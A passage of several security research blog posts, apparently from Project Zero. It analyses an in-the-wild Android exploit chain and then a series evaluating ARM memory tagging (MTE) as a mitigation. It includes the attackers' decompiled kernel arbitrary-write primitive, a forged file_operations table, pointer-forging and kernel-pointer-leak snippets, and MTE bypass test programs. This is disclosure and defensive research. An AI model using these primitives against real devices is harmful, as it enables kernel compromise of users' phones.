While the fops table itself is read-only, the ashmem_misc data structure containing the pointer used to populate future struct files during an open of /dev/ashmem is not. By replacing ashmem_misc.fops with a pointer to a fake file_operations struct, an attacker can control the file_operations used by any file subsequently created by open("/dev/ashmem"). This requires forging a replacement ashmem_fops file_operations table in kernel memory, so that a later arbitrary write can store a pointer to that table in the ashmem_misc structure. The previously explained Mali tlstream “controlled data at a known kernel address” primitive (CVE-2023-26083) provides precisely this sort of ability, but the object read out via tlstream only carries 16 bytes of attacker-controlled data - not enough to forge a complete file_operations table. Instead, the attackers use their initial unreliable arbitrary write to construct the fake fops table within the .data section of the kernel, writing it into the init_uts_ns kernel symbol - specifically the part of the associated structure that holds the uname of the kernel. Overwriting data in this structure also provides a clear indicator of when the race conditions are won and the arbitrary write succeeds: the uname syscall returns different data than before.
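Detecting a successful write from user space is then as cheap as calling uname(2); a minimal sketch:

#include <string.h>
#include <sys/utsname.h>

// returns nonzero once the overwrite of init_uts_ns has landed:
// uname() copies the kernel's utsname back to user space, so changed
// contents signal that the racy write succeeded
int write_landed(const struct utsname *before) {
  struct utsname now;
  uname(&now);
  return memcmp(&now, before, sizeof(now)) != 0;
}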


Once their fake file_operations table is forged, they use their arbitrary write once more to place a pointer to this table inside of the ashmem_misc structure. This forged file_operations struct varies from device to device, but on the Samsung S10 it looks like so:


static const struct file_operations ashmem_fops = {
  .open = ashmem_open,
  .release = ashmem_release,
  .read = configfs_read_file,
  .write = configfs_write_file,
  .llseek = default_llseek,
  .mmap = ashmem_mmap,
  .unlocked_ioctl = ashmem_ioctl,
#ifdef CONFIG_COMPAT
  .compat_ioctl = compat_ashmem_ioctl,
#endif
};


Note that the VFS read/write operations have been changed to point to configfs handlers instead. The combination of configfs file ops with ashmem file ops leads to an attacker-induced type-confusion on the private_data object in the struct file. Analysis of those handlers reveals simple-to-reach copy_[to/from]_user calls with the kernel pointer populated from the struct file’s private_data backing store:


static int
fill_write_buffer(struct configfs_buffer * buffer, const char __user * buf, size_t count)
{
  ...
  if (count >= SIMPLE_ATTR_SIZE)
    count = SIMPLE_ATTR_SIZE - 1;
  error = copy_from_user(buffer->page,buf,count);
  buffer->needs_read_fill = 1;
  buffer->page[count] = 0;
  return error ? -EFAULT : count;
}
...
static ssize_t
configfs_write_file(struct file *file, const char __user *buf, size_t count, loff_t *ppos)
{
  struct configfs_buffer * buffer = file->private_data;
  ssize_t len;

  mutex_lock(&buffer->mutex);
  len = fill_write_buffer(buffer, buf, count);
  if (len > 0)
    len = flush_write_buffer(file->f_path.dentry, buffer, len);
  if (len > 0)
    *ppos += len;
  mutex_unlock(&buffer->mutex);
  return len;
}

The private_data backing store itself can be subsequently modified by an attacker using the ashmem ioctl command ASHMEM_SET_NAME in order to change the kernel pointer used for the arbitrary read and write primitives. The final arbitrary write primitive (for example) looks like this:


int arb_write(unsigned long dst, const void *src, size_t size)
{
  __int64 page_offset; // x8
  __int128 v5; // q0
  __int64 neg_idx; // x24
  void *data_to_write; // x21
  char tmp_name_buffer[256]; // [xsp+0h] [xbp-260h] BYREF
  char name_buffer[256]; // [xsp+100h] [xbp-160h] BYREF
  char v13; // [xsp+200h] [xbp-60h]
  ...
  memset(tmp_name_buffer, 0, sizeof(tmp_name_buffer));
  page_offset = *(_QWORD *)(*(_QWORD *)(qword_898840 + 24) + 1056LL);
  if ( (page_offset & 0x8000000000000000LL) == 0 )
  {
    while ( 1 )
      ;
  }
  //dst is the kernel address we will write to
  *(_QWORD *)&tmp_name_buffer[(int)page_offset] = dst;
  neg_idx = 0;
  memset(name_buffer,'C',sizeof(name_buffer));
  //They have to do this backwards while loop so they can write
  //nulls into the name buffer
  while (1)
  {
    name_buffer[neg_idx + 244] = tmp_name_buffer[neg_idx + 255];
    if ( ioctl(ashmem_fd, ASHMEM_SET_NAME, name_buffer) < 0 )
      break;
    if ( --neg_idx == -245 )
    {
      //At this point, the ->page used in configfs_write_file will
      //be set due to the ASHMEM_SET_NAME calls
      if ( lseek(ashmem_fd, 0LL, 0) >= 0 )
      {
        data_to_write = (void *)(mmap_page - size + 4096);
        memcpy(data_to_write, src, size);
        //This will EFAULT due to intentional misalignment on the
        //page so as to ensure copying the right number of bytes
        write(ashmem_fd, data_to_write, size + 1);
        return 0;
      }
      return -1;
    }
  }
  return -1;
}


The arbitrary read primitive is nearly identical to the arbitrary write primitive code, but instead of using write(2), they use read(2) from the ashmem_fd instead to read data from the kernel into userland.


Conclusion

This exploit chain provides a real-world example of what we believe modern in-the-wild Android exploitation looks like. An early contextual theme from the initial stages of this exploit chain (not described in detail in this post) is the reliance on n-days to bypass the hardest security boundaries. Reliance on patch backporting by downstream vendors leads to a fragile ecosystem where a single missed bugfix can lead to high-impact vulnerabilities on end-user devices. The retention of these vulnerabilities in downstream codebases counteracts the efforts that the security research and broader development community invest in discovering bugs and developing patches for widely used software. It would greatly improve end-user security if vendors adopted efficient methods that propagate patches to downstream devices faster and more reliably.


It is also particularly noteworthy that this attacker created an exploit chain using multiple bugs from kernel GPU drivers. These third-party Android drivers have varying degrees of code quality and regularity of maintenance, and this represents a notable opportunity for attackers. We also see the risk that the Linux kernel 32-bit compatibility layer presents, particularly when it requires the same patch to be re-implemented in multiple places. This requirement makes patching even more complex and error-prone, so vendors and kernel developers must continue to remain vigilant to ensure that the 32-bit compatibility layer presents as few security issues as possible in the future.


Update October 6th 2023: This post was edited to reflect the fact that CVE-2022-4262 was a Chrome 0-day at the time this chain was discovered, not an n-day as previously stated.


MTE As Implemented, Part 3: The Kernel

2 August 2023 at 16:30

By Mark Brand, Project Zero

Background

In 2018, in the v8.5a version of the ARM architecture, ARM proposed a hardware implementation of tagged memory, referred to as MTE (Memory Tagging Extensions).

In Part 1 we discussed testing the technical (and implementation) limitations of MTE on the hardware that we've had access to. In Part 2 we discussed the implications of this for mitigations built using MTE in various user-mode contexts. This post will now consider the implications of what we know on the effectiveness of MTE-based mitigations in the kernel context.

To recap - there are two key classes of bypass techniques for memory-tagging based mitigations, and these are the following:

  1. Known-tag-bypasses - In general, confidentiality of tag values is key to the effectiveness of memory-tagging as a mitigation. A breach of tag confidentiality allows the attacker to directly or indirectly ensure that their invalid memory accesses will be correctly tagged, and therefore not detectable.
  2. Unknown-tag-bypasses - Implementation limits might mean that there are opportunities for an attacker to still exploit a vulnerability despite performing memory accesses with incorrect tags that could be detected.

There are two main modes for MTE enforcement:

  1. Synchronous (sync-MTE) - tag check failures result in a hardware fault on instruction retirement. This means that the results of invalid reads and the effects of invalid writes should not be architecturally observable.
  2. Asynchronous (async-MTE) - tag check failures do not directly result in a fault. The results of invalid reads and the effects of invalid writes are architecturally observable, and the failure is delivered at some point after the faulting instruction in the form of a per-cpu flag.

Since Spectre, it has been clear that using standard memory-tagging approaches as a "hard probabilistic mitigation"1 is not generally possible - in any context where an attacker can construct a speculative side-channel, known-tag-bypasses are a fundamental weakness that must be accounted for.

Kernel-specific problems

There are a number of additional factors which make robust mitigation design using MTE more problematic in the kernel context.

From a stability perspective, it might be considered problematic to enforce a panic on kernel-tag-check-failure detection - we believe that this would be essential for any mitigation based on async (or asymmetric) MTE modes.

Here are some problems that we think will be difficult to address systematically:

  1. Similar to the Chrome renderer scenario discussed in Part 2, we expect there to be continued problems in guaranteeing confidentiality of kernel memory in the presence of CPU speculative side-channels.

    This fundamentally limits the effectiveness of an MTE-based mitigation in the kernel against a local attacker, making known-tag-bypasses highly likely.
  2. TCR_ELx.TCMA1 is required in the current kernel implementation. This means that any pointer with the tag 0b1111 can be dereferenced without enforcing tag checks. This is necessary for various reasons - there are many places in the kernel where, for example, we need to produce a dereferenceable pointer from a physical address, or an offset in a struct page.

    This makes it possible for an attacker to reliably forge pointers to any address, which is a significant advantage during exploitation (see the short sketch after this list).
  3.  [ASYNC-only] Direct access to the Tag Fault Status Register TFSR_EL1 is likely necessary. If so, the kernel is capable of clearing the tag-check-failure flags for itself; this is a weakness that will likely form part of the simplest unknown-tag-bypass exploits. This weakness does not exist in user-space, as it is necessary to transition into kernel-mode to clear the tag-check-failure bits, and the transition into kernel-mode should detect the async tag-check-failure and dispatch an error appropriately.
  4. DMA - typically multiple devices on the system have DMA access to various areas of physical memory, and in the cases of complex devices such as GPUs or hardware accelerators, this includes dynamically mapping parts of normal user space or kernel space memory.

    This can pose multiple problems - any code that sets up device mappings is already critical to security, but this is also potentially of use to an attacker in constructing powerful primitives (after the "first invalid access").
  5. DMA from non-MTE enabled cores on the system - we've already seen in-the-wild attackers start to use coprocessor vulnerabilities to bypass kernel mitigations, and if those coprocessors have a lower level of general software mitigations in place we can expect to see this continue.

    This alone isn't a reason not to use MTE in kernels - it's just something that we should bear in mind, especially when considering the security implications of moving additional code to coprocessors.
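As a concrete illustration of the pointer-forging enabled by point 2 above, an attacker-controlled pointer only needs its tag nibble forced to 0b1111 (a minimal sketch, assuming a kernel running with TCR_EL1.TCMA1 set):

#include <stdint.h>

// with TCMA1 set, accesses through pointers tagged 0b1111 skip tag
// checks entirely, so forcing the tag bits (VA bits [59:56]) makes a
// forged pointer "match" any allocation
static inline void *forge_match_all(uint64_t kernel_address) {
  return (void *)(kernel_address | (0xfULL << 56));
}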

Additionally, there are problems that limit coverage (due to current implementation details in the linux kernel):

  1. The kcmp syscall is problematic for confidentiality of kernel pointers, as it allows user-space to compare two struct file* pointers for equality (see the sketch after this list). Other system calls have similar implementation details that allow user-space to leak information about equality of kernel pointers (fuse_lock_owner_id).
  2. Similarly to the above issue, several kernel data structures use pointers as keys, which has also been used to leak information about kernel pointers to user-space. (See here, search for epoll_fdinfo).

    This is an issue for user-space use of MTE as well, especially in the context of eg. a browser renderer process, but highlighting here that there are known instances of this pattern in the linux kernel that have already been used publicly.

  3. TYPESAFE_BY_RCU regions require/allow use-after-free access by design, so allocations in these regions could not currently be protected by memory-tagging. (See this thread for some discussion).
  4. In addition to skipping specific tag-check-failures (as per item 3 in the first list above), it may also be currently possible for an attacker to disable kasan using a single memory write. This would also be a single point of failure that would need to be avoided.
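For example, the kcmp pointer-equality leak from point 1 is a single system call (a sketch; error handling omitted):

#include <linux/kcmp.h>
#include <sys/syscall.h>
#include <unistd.h>

// returns 1 if fd_a and fd_b refer to the same struct file in the
// kernel - i.e. it leaks the equality of two kernel pointers
int same_struct_file(pid_t pid, int fd_a, int fd_b) {
  return syscall(SYS_kcmp, pid, pid, KCMP_FILE, fd_a, fd_b) == 0;
}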

[1] A hard mitigation that does not provide deterministic protection, but which can be universally bypassed by the attacker "winning" a probabilistic condition, in the case of MTE (with 4 tag bits available, likely with one value reserved) this would probably imply a 1/15 chance of success.

MTE As Implemented, Part 2: Mitigation Case Studies

2 August 2023 at 16:30

By Mark Brand, Project Zero

Background

In 2018, in the v8.5a version of the ARM architecture, ARM proposed a hardware implementation of tagged memory, referred to as MTE (Memory Tagging Extensions).

In Part 1 we discussed testing the technical (and implementation) limitations of MTE on the hardware that we've had access to. This post will now consider the implications of what we know on the effectiveness of MTE-based mitigations in several important products/contexts.

To summarize - there are two key classes of bypass techniques for memory-tagging based mitigations, and these are the following (for some examples, see Part 1):

  1. Known-tag-bypasses - In general, confidentiality of tag values is key to the effectiveness of memory-tagging as a mitigation. A breach of tag confidentiality allows the attacker to directly or indirectly ensure that their invalid memory accesses will be correctly tagged, and are therefore not detectable.
  2. Unknown-tag-bypasses - Implementation limits might mean that there are opportunities for an attacker to still exploit a vulnerability despite performing memory accesses with incorrect tags that could be detected.

There are two main modes for MTE enforcement:

  1. Synchronous (sync-MTE) - tag check failures result in a hardware fault on instruction retirement. This means that the results of invalid reads and the effects of invalid writes should not be architecturally observable.
  2. Asynchronous (async-MTE) - tag check failures do not directly result in a fault. The results of invalid reads and the effects of invalid writes are architecturally observable, and the failure is delivered at some point after the faulting instruction in the form of a per-cpu flag.

Since Spectre, it has been clear that using standard memory-tagging approaches as a "hard probabilistic mitigation"1 is not generally possible. In any context where an attacker can construct a speculative side-channel, known-tag-bypasses are a fundamental weakness that must be accounted for.

Another proposed approach is combining MTE with another software approach to construct a "hard deterministic mitigation"2. The primary example of this would be the *Scan+MTE combinations proposed in Chrome to mitigate use-after-free vulnerabilities by ensuring that a tag is not re-used for an allocation while there are any stale pointers pointing to that allocation.

In this case, is async-MTE sufficient as an effective mitigation? We have demonstrated techniques that allow an unknown-tag-bypass when using async-MTE, so it seems clear that for a "hard" mitigation, (at least) sync-MTE will be necessary. This should not, however, be interpreted as implying that such a "soft" mitigation would not prove a significant inconvenience to attackers - we're going to discuss that in detail below.

How much would MTE hurt attackers?

In order to understand the "additional difficulty" that attackers will face in writing exploits that can bypass MTE based mitigations, we need to consider carefully the context in which the attacker finds themself.

We have assumed here that the target reliability a high-tier attacker would want is around 95% - this is likely lower than currently expected in most cases, but probably higher than the absolute limit at which an exploit might become too unreliable for their operational needs. We also note that in some contexts an attacker might be able to use even an extremely unreliable exploit without significantly increasing their risk of detection. While we'd expect attackers to desire (and invest in) achieving reliability, it's unlikely that even if we could force an upper bound on that reliability this would be enough to completely prevent exploitation.

However, any such drop in reliability should generally be expected to increase detection of in-the-wild usage of exploits, increasing the risk to attackers accordingly.

An additional note is that most unknown-tag-bypasses would be prevented by the use of sync-MTE, at least in the absence of specific weaknesses in the application which would over time likely be fixed as exploits are observed exploiting those weaknesses.

We consider 4 main contexts here, as we believe these are the most relevant/likely use-cases for a usermode mitigation:

Context                         | Mode  | known-tag-bypass                   | unknown-tag-bypass
--------------------------------|-------|------------------------------------|---------------------------------------
Chrome: Renderer Exploit        | async | Trivial ♻️                         | Likely trivial ♻️
Chrome: Renderer Exploit        | sync  | Trivial ♻️                         | Bypass techniques should be rare 🛠️
Chrome: IPC Sandbox Escape      | async | Likely possible in many cases ♻️   | Likely possible in many cases 🐛*
Chrome: IPC Sandbox Escape      | sync  | Likely possible in many cases ♻️   | Bypass techniques should be rare 🛠️
Android: Binder Sandbox Escape  | async | Difficulty will depend on service  | Difficulty will depend on service 🐛*
Android: Binder Sandbox Escape  | sync  | Difficulty will depend on service  | Bypass techniques should be rare 🛠️
Android: Messaging App Oneshot  | async | Likely impossible in most cases    | Good enough bugs will be very rare 🐛*
Android: Messaging App Oneshot  | sync  | Likely impossible in most cases    | Bypass techniques should be rare 🛠️

The degree of pain for attackers caused by needing to bypass MTE is roughly assessed from low to very high.

♻️: Once developed, generic bypass technique can likely be shared between exploits.

🛠️: Limited supply of bypass techniques that could be fixed, eventually eliminating this bypass.

🐛: Additional constraints imposed by bypass techniques mean that the subset of issues that are exploitable is significantly reduced with MTE.

* Note that it's also potentially possible to design software to make exploitation of these unknown-tag-bypass techniques more restrictive by eg. inserting system calls in specific choke-points. We haven't investigated the practicality or limitations of such an approach at this time, but it is unlikely to be generally applicable especially where third-party code is involved.

Chrome: Javascript -> Compromised Renderer

Spectre-type speculative side-channels can be used to break tag confidentiality, so known-tag-bypasses are a certainty.

For unknown-tag-bypasses, javascript should in most situations be able to avoid system calls for the duration of the exploit, so the exploit needs to complete within the soft time constraint.

It's likely that both known-tag-bypass and unknown-tag-bypass techniques can be made generic and reused across multiple different vulnerabilities.

Chrome: Compromised Renderer -> Mojo IPC Sandbox Escape

It is likely that Spectre-type speculative side-channels can be used to break tag confidentiality, so known-tag-bypasses are a possibility.

For unknown-tag-bypasses, we believe that there are circumstances under which multiple IPC messages can be processed without a system call in between. This does not hold for all situations, and the current public state-of-the-art techniques for Browser process IPC exploitation would perform multiple system calls and would not be suitable.

It's possible that a generic speculative-side-channel attack could be developed that would allow reuse of techniques for known-tag-bypasses against a specific privileged process (likely the Browser process). Any unknown-tag-bypass exploit would likely require additional per-bug cost to develop due to the additional complexity required in avoiding system calls for the duration of the exploit.

Android: App -> Binder IPC Sandbox Escape

It is likely that Spectre-type speculative side-channels can be used to break tag confidentiality, so known-tag-bypasses are a possibility.


For unknown-tag-bypasses, we note that there is a mandatory system call ioctl(..., BINDER_WRITE_READ, …) between different IPC messages. This implies that an exploit would need to complete within the execution of the triggering IPC message, in addition to meeting the soft time constraint.

As there are a large number of different Binder IPC services hosted in different processes, a known-tag-bypass technique is less likely to be reusable between different vulnerabilities. The exploitation of unknown-tag-bypasses is unlikely to be reusable, and will require specific per-vulnerability development.

An additional note - at present, .data section pointers are not tagged, so the zygote architecture means that pointer-forging between some contexts would be easy for an attacker, which could be a useful technique for exploiting some vulnerabilities leading to second-order memory corruption (eg. type confusion allowing an attacker to treat data as a pointer).

Android: Remote -> Messaging App

It is unlikely that Spectre-type speculative side-channels can be used to break tag confidentiality, so known-tag-bypasses are highly unlikely, unless the application allows alternative side channels (or eg. repeated exploitation attempts until the tag is correct).


For unknown-tag-bypasses, attackers will need a very good one-shot bug, likely in complex file-format parsing. An exploit would still need to meet the soft time constraint.

It's likely that exploitation techniques here will be bespoke and both per-application and per-vulnerability, even if there is significant shared code between different messaging applications.


Part 3 continues this series with a more detailed discussion of the specifics of applying MTE to the kernel, which has some additional nuance (and may still contain some information of interest even if you're only interested in user-space applications). 

[1] A hard mitigation that does not provide deterministic protection, but which can be universally bypassed by the attacker "winning" a probabilistic condition, in the case of MTE (with 4 tag bits available, likely with one value reserved) this would probably imply a 1/15 chance of success.

[2] A hard mitigation that does provide deterministic protection.

MTE As Implemented, Part 1: Implementation Testing

2 August 2023 at 16:30

By Mark Brand, Project Zero

Background

In 2018, in the v8.5a version of the ARM architecture, ARM proposed a hardware implementation of tagged memory, referred to as MTE (Memory Tagging Extensions).

Through mid-2022 and early 2023, Project Zero had access to pre-production hardware implementing this instruction set extension to evaluate the security properties of the implementation. In particular, we're interested in whether it's possible to use this instruction set extension to implement effective security mitigations, or whether its use is limited to debugging/fault detection purposes.

As of the v8.5a specification, MTE can operate in two distinct modes, which are switched between on a per-thread basis. The first mode is sync-MTE, where tag-check failure on a memory access will cause the instruction performing the access to deliver a fault at retirement. The second mode is async-MTE, where tag-check failure does not directly (at the architectural level) cause a fault. Instead, tag-check failure will cause the setting of a per-core flag, which can then be polled from the kernel context to detect when an invalid access has occurred.

This blog post documents the tests that we have performed so far, and the conclusions that we've drawn from them, together with the code necessary to repeat these tests. This testing was intended to explore both the details of the hardware implementation of MTE, and the current state of the software support for MTE in the Linux kernel. All of the testing is based on manually implemented tagging in statically-linked standalone binaries, so it should be easy to reproduce these results on any compatible hardware.

Terminology

When designing and implementing security features, it's important to be conscious of the specific protection goal. In order to provide clarity in the rest of this post, we'll define some specific terminology that we use when talking about this:

  1. Mitigation - A mitigation is something that reduces real exploitability of a vulnerability or class of vulnerability. The expectation is that attackers can (and eventually will) find their way around it. Examples would be DEP, ASLR, CFI.
       1. "Soft" Mitigation - We consider a mitigation to be "soft" if the expectation is that an attacker pays a one-time cost in order to bypass the mitigation. Typically this would be a per-target cost, for example developing a ROP chain to bypass DEP, which can usually be largely re-used between different exploits for the same target software.
       2. "Hard" Mitigation - We consider a mitigation to be "hard" if the expectation is that an attacker cannot develop a bypass technique which is reusable between different vulnerabilities (without, e.g. incorporating an additional vulnerability). An example would be ASLR, which is typically bypassed either by the use of a separate information leak vulnerability, or by developing an information leak primitive using the same vulnerability.

Note that the context can have an impact on the "hardness" of a mitigation - if a codebase is particularly rich in code-patterns which allow the construction of information leaks, it's quite possible that an attacker can develop a reliable, reusable technique for turning various memory corruption primitives into an information leak within that codebase.

  2. Solution - a solution is something that eliminates exploitability of a vulnerability or class of vulnerability. The expectation is that the only way for an attacker to bypass a solution would be an unintended implementation weakness in the solution.

For example (based purely on a theoretical implementation of memory tagging):

 - Randomly-allocating tags to heap allocations cannot be considered a solution for any class of heap-related memory corruption, since this provides at best probabilistic protection.

 - Allocating odd and even tags to adjacent heap allocations might theoretically be able to provide a solution for linear heap-buffer overflows.

Hardware Implementation

The main hardware implementation question we had was, does a speculative side-channel exist that would allow leaking whether or not a tag-check has succeeded, without needing to architecturally execute the tag-check?

It is expected that Spectre-type speculative execution side-channels will still allow an attacker to leak pointer values from memory, indirectly leaking the tags. Here we consider whether the implementation introduces additional speculative side-channels that would allow an attacker to more efficiently leak tag-check success/failure.

TL;DR: In our testing we did not identify an additional1 speculative side-channel that would allow such an attack to be performed.

1. Does MTE block Spectre? (NO)

The only way that MTE could prevent exploitation of Spectre-type weaknesses would be to have speculative execution stall the pipeline until the tag-check completes2. This might sound desirable ("prevent exploitation of Spectre-type weaknesses") but it's not - this would create a much stronger side-channel to allow an attacker to create an oracle for tag-check success, weakening the overall security properties of the MTE implementation.

This is easy to test. If we can still leak data out of speculative execution using Spectre when the pointer used for the speculative access has an incorrect tag, then this is not the case.

We wrote a small patch to the safeside demo spectre_v1_pht_sa that demonstrates this:

mte_device:/data/local/tmp $ ./spectre_v1_pht_sa_mte
Leaking the string: 1t's a s3kr3t!!!
Done!
Checking that we would crash during architectural access:
Segmentation fault
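The gadget being exercised has the classic Spectre-v1 shape, just with a deliberately mistagged pointer (a simplified sketch of the idea, not the actual safeside patch):

#include <stddef.h>
#include <stdint.h>

extern uint8_t *secret_mistagged; // correct address, wrong MTE tag
extern uint8_t probe[256 * 512];  // cache side-channel array
extern size_t bound;              // kept uncached so the branch resolves late
volatile uint8_t sink;

void gadget(size_t idx) {
  if (idx < bound) {                        // mispredicted during the attack
    uint8_t value = secret_mistagged[idx];  // architecturally this would fault
                                            // (sync) or set the flag (async)...
    sink = probe[value * 512];              // ...but speculation still leaves a
                                            // secret-dependent cache footprint
  }
}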

2. Does tag-check success/failure have a measurable impact on the speculation window length? (Probably NOT)

There is a deeper question that we'd like to understand: is the length of speculative execution after a memory access influenced by whether the tag-check for that access succeeds or fails? If this was the case, then we might be able to build a more complex speculative side-channel that we could use in a similar way.

In order to measure this, we need to force a mis-speculation, and then perform a read access to memory for which a tag-check would either succeed or fail, and then we need to use a speculative side-channel to measure how many further instructions were successfully speculatively executed. We wrote and tested a self-contained harness to measure this, which can be found in speculation_window.c.

This harness works by generating code for a test function with a variable number of no-op instructions at runtime, and then repeatedly executing this test function in a loop to train the branch-predictor before finally triggering mis-speculation. The test function is as follows:

  ldr  x0, [x0]        ; this load is slow (*x0 is uncached)
  cbnz x0, speculation ; this branch is always taken during warmup
  ret
speculation:
  ldr  x1, [x1]        ; this load is fast (*x1 is cached)
                       ; the tag-check success or fail will happen on
                       ; this access, but during warmup the tag-check
                       ; will always be a success.
  orr  x2, x2, x1      ; this is a no-op (as x1 is always 0) but it
  ... n times ...      ; maintains a data dependency between the
  orr  x2, x2, x1      ; loads (and the no-ops), hopefully preventing
                       ; too much re-ordering.
  ldr  x2, [x2]        ; *x2 is uncached, if it is cached later then
                       ; this instruction was (probably) executed.
  ret


In this way we can measure the number of no-ops that we can insert before the final load no longer executes (ie. the result from the first load is received and we realise that we've mispredicted the branch so we flush the pipeline before the final load is executed).

In order to reduce bias due to branch-predictor behaviour, the test program is run separately for the tag-check success and tag-check failure case, and the control-flow being run is identical in both cases.

In order to reduce bias due to cpu power-management/throttling behaviour, each time the test program is run, it collects a single set of samples and then exits. We then run this program repeatedly, and by interleaving the runs for tag-check success and tag-check fail we look to reduce this influence on the results. In addition, the cores are down-clocked to the lowest supported frequency using the standard linux cpu scaling interface, which should reduce the impact of cpu throttling to a minimum.

Most modern mobile devices also have non-homogenous core designs, with for example a 4+4, 2+2+4 or 1+3+4 core design. Since the device under test is no exception, the program needs to pin itself to a specific core and we need to run these tests for each core design separately.

Reading from the virtual timer is extremely slow (relative to memory access instructions), and this results in noisy data when attempting to measure single-cache-hit/single-cache-miss. In a normal real-world environment, a shared-memory timer is often a better approach to timing with this level of granularity, and that's an approach that we've used previously with success. In this case, since we want to get data for each core, it was difficult to get consistency across all cores, and we had better results using an amplification approach performing accesses to multiple cache-lines.
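For reference, a shared-memory timer of the kind referred to here is usually just a counting thread (a minimal sketch):

#include <stdint.h>

static volatile uint64_t ticks; // the shared "clock"

// pinned to its own core (e.g. started via pthread_create), this
// increments as fast as it can; measuring code samples `ticks` before
// and after the access of interest instead of paying the cost of a
// virtual timer read
static void *timer_thread(void *arg) {
  (void)arg;
  for (;;)
    ticks++;
  return NULL;
}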

However, the amplification approach adds more complexity to the measuring code, and more possibilities for smart prefetching or similar to interfere with our measurements. Since we are trying to test the properties of the hardware, rather than develop a practical attack that needs to run in a timely fashion, we decided to minimise these risks and instead collect enough data that we'd be able to see the patterns through the noise.

The first graphs below show this data for a region of the x-axis (nop-count) on each core around where the speculation window ends (so the x-axis is anchored differently for each core), and on the y-axis we plot the observed probability that our measurement results in a cache-miss. Two separate lines are plotted in each graph; one in red for the "tag-check-fail" case and one in green for the "tag-check-pass" case. We can't really see the green line at all - the two lines overlap so closely as to be indistinguishable.

If we really zoom in on measurements from the "Biggest" core, we can see the two lines deviating due to the noise:


Another interesting point is to notice that the graph we have for the biggest core tops out at a probability of ~30%; this is (probably) not because we're hitting the cache, but instead because the timer read is so slow that we can't use it to reliably differentiate between cache misses and cache hits most of the time. If we look at a graph of raw latency measurements, we can see this:

The important thing is that there's no significant difference between the results for the failure and success cases, which suggests that there's no clear speculative side-channel that would allow an attacker to build a side-channel tag-check oracle directly.

Software Implementation

There are several ways that we identified that the current software implementation around the use of MTE could lead to bypasses if MTE were used as a security mitigation.

As described below, Issues 1 and 2 are quirks of the current implementation that it may or may not be possible to address with kernel changes. They are both of limited scope and only apply to very specific conditions, so they likely don't have a particularly significant impact on the applicability of MTE as a security mitigation (although they have some implications for the coverage of such a mitigation.)

Issue 3 is a detail of the current implementation of Breakpad, and serves to highlight a particular class of weakness that will require careful audit of signal handling code in any application that wishes to use MTE as a security mitigation.

Issue 4 is a fundamental weakness that likely cannot be effectively addressed. We would not characterize this as meaning that MTE could not be applied as a security mitigation, but rather as a limitation on the claims that one could make about the effectiveness of such a mitigation.

To be more specific, both issues 3 and 4 are bound by some fairly significant limitations, which would have varying impact on exploitability of memory corruption issues depending on the specific context in which the issue occurs. See below for more discussion on this topic.

TL;DR: In our testing we identified some areas for improvement on the software side, and demonstrated that it is possible to use the narrow "exploitation window" to avoid the side-effects of tag-check failures under some circumstances, meaning that any mitigation based on async MTE is likely limited to a "soft mitigation" regardless of tagging strategy.

1. Handling of system call arguments [ASYNC]

There's a documented limitation of the current handling of the async MTE check mode in the linux kernel, which is that the kernel does not catch invalid accesses to userspace pointers. This means that kernel-space accesses to incorrectly tagged user-space pointers during a system call will not be detected.

There are likely good technical reasons for this limitation, but we plan to investigate improving this coverage in the future.

We provide a sample that demonstrates this limitation, software_issue_1.c.

mte_enable(false, DEFAULT_TAG_MASK);
uint64_t* ptr = mmap(NULL, 0x1000,
  PROT_READ|PROT_WRITE|PROT_MTE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
uint64_t* tagged_ptr = mte_tag_and_zero(ptr, 0x1000);
memset(tagged_ptr, 0x23, 0x1000);
int fd = open("/dev/urandom", O_RDONLY);
fprintf(stderr, "%p %p\n", ptr, tagged_ptr);
read(fd, ptr, 0x1000);
assert(*tagged_ptr == 0x2323232323232323ull);

taro:/ $ /data/local/tmp/software_issue_1
0x7722c5d000 0x800007722c5d000
software_issue_1: ./software_issue_1.c:46: int main(int, char **): Assertion `*tagged_ptr == 0x2323232323232323ull' failed.

2. Handling of system call arguments [SYNC]

The way that the sync MTE check mode is currently implemented in the linux kernel means that kernel-space accesses to incorrectly tagged user-space pointers result in the system call returning EFAULT. While this is probably the cleanest and simplest approach, and is consistent with current kernel behaviour especially when it comes to handling results for partial operations, this has the potential to lead to bypasses/oracles in some circumstances.

We plan to investigate replacing this behaviour with SIGSEGV delivery instead (specifically for MTE tag check failures).

The provided sample, software_issue_2.c, is a very simple demonstration of this situation.

size_t readn(int fd, void* ptr, size_t len) {
  char* start_ptr = ptr;
  char* read_ptr = ptr;
  while (read_ptr < start_ptr + len) {
    ssize_t result = read(fd, read_ptr, start_ptr + len - read_ptr);
    if (result <= 0) {
      return read_ptr - start_ptr;
    } else {
      read_ptr += result;
    }
  }
  return len;
}

int main(int argc, char** argv) {
  int pipefd[2];
  mte_enable(true, DEFAULT_TAG_MASK);
  uint64_t* ptr = mmap(NULL, 0x1000,
    PROT_READ|PROT_WRITE|PROT_MTE, MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
  ptr = mte_tag(ptr, 0x10);
  strcpy(ptr, "AAAAAAAAAAAAAAA");
  assert(!pipe(pipefd));
  write(pipefd[1], "BBBBBBBBBBBBBBB", 0x10);
  // In sync MTE mode, kernel MTE tag-check failures cause system calls to fail
  // with EFAULT rather than triggering a SIGSEGV. Existing code doesn't
  // generally expect to receive EFAULT, and is very unlikely to handle it as a
  // critical error.
  uint64_t* new_ptr = ptr;
  while (!strcmp(new_ptr, "AAAAAAAAAAAAAAA")) {
    // Simulate a use-after-free, where new_ptr is repeatedly free'd and ptr
    // is accessed after the free via a syscall.
    new_ptr = mte_tag(new_ptr, 0x10);
    strcpy(new_ptr, "AAAAAAAAAAAAAAA");
    size_t bytes_read = readn(pipefd[0], ptr, 0x10);
    fprintf(stderr, "read %zu bytes\nnew_ptr string is %s\n", bytes_read, new_ptr);
  }
}

taro:/ $ /data/local/tmp/software_issue_2
read 0 bytes
new_ptr string is AAAAAAAAAAAAAAA
read 0 bytes
new_ptr string is AAAAAAAAAAAAAAA
read 0 bytes
new_ptr string is AAAAAAAAAAAAAAA
read 0 bytes
new_ptr string is AAAAAAAAAAAAAAA
read 0 bytes
new_ptr string is AAAAAAAAAAAAAAA
read 0 bytes
new_ptr string is AAAAAAAAAAAAAAA
read 0 bytes
new_ptr string is AAAAAAAAAAAAAAA
read 16 bytes
new_ptr string is BBBBBBBBBBBBBBB

3. New dangers in signal handlers [ASYNC].

